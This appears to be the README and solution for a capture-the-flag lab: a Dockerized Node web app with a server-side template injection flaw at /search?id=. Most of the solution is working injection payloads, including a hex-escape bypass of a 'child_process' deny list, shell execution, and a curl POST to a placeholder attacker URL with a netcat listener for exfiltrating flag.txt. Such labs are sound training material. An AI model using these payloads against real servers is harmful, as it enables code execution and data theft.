Build
sudo docker build -t ssti .
Run
sudo docker run --network="bridge" -p8000:8000 ssti
Application should be accessible via “localhost” and “docker0” interface. Retrieve the “flag.txt” file in the “/” directory to win!
Hint: Don’t need remote code execution, but maybe we can “curl” something out?
Solution
1. Injection point is in /search?id=[vulnerable]
2. Can use basic template injection to reflect output: %23{7*7} (# needs to be encoded)
3. Bypass "child_process" deny listing with "%23{function(){localLoad%3dglobal.process.mainModule.constructor._load%3bsh%3dlocalLoad("\x63hild_process").exec('touch+/tmp/pwned.txt')}()}"
4. Use curl and self-hosted netcat listener to retrieve file via POST (Bridged network)
%23{function(){localLoad%3dglobal.process.mainModule.constructor._load%3bsh%3dlocalLoad("child_process").exec('curl+-X+POST+-d+flag.txt+[attacker_url]')}()}
nc -nvlp [port]